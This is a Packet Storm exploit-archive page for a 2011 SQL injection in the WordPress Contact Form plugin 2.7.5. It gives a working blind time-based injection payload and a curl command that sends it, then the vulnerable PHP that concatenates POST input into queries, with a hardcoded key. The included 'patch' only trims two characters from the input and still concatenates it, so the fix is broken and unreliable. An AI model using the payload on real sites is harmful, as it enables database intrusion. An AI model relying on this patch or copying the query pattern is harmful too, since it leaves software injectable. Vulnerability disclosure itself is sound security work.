exploit the possibilities

WordPress Contact Form 2.7.5 SQL Injection / Patch

WordPress Contact Form 2.7.5 SQL Injection / Patch
Posted Oct 14, 2011
Authored by Skraps

WordPress Contact Form plugin versions 2.7.5 and below suffer from a remote SQL injection vulnerability. A patch is included.

tags | exploit, remote, sql injection
MD5 | 45618e3593eb3c3739b9db1eeab3c557

WordPress Contact Form 2.7.5 SQL Injection / Patch

Change Mirror Download
# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)

e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1

---------------
Vulnerable code
---------------
Line 49:
public function the_content($content) {
global $wpdb;
global $table_name;
global $settings_table_name;

$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {

$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig 2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php 2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

$continue = true;

--- 54,63 ----
$private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

if ($_POST['wpcf_easyform_submitted'] == 1) {
! $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
! $wpcf_easyform_formid=substr($wpcf_easyform_formid,2);
!
! $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);

$continue = true;

***************
*** 71,80 ****
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$_POST['wpcf_easyform_formid']."
ORDER BY position
");

--- 73,82 ----
if ($continue) {

//loop through the fields of this form (read from DB) and build the message here
! $form_fields = $wpdb->get_results("
SELECT *
FROM $settings_table_name
! WHERE form_id = ".$wpcf_easyform_formid."
ORDER BY position
");



Comments (1)

RSS Feed Subscribe to this comment feed
skraps

For some reason they took the original file off of wordpress and the page. hmmm. Heres the original file that was downloaded. www.mediafire.com/?vsc9uygo6a6830p

Comment by skraps
2011-10-14 18:31:06 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close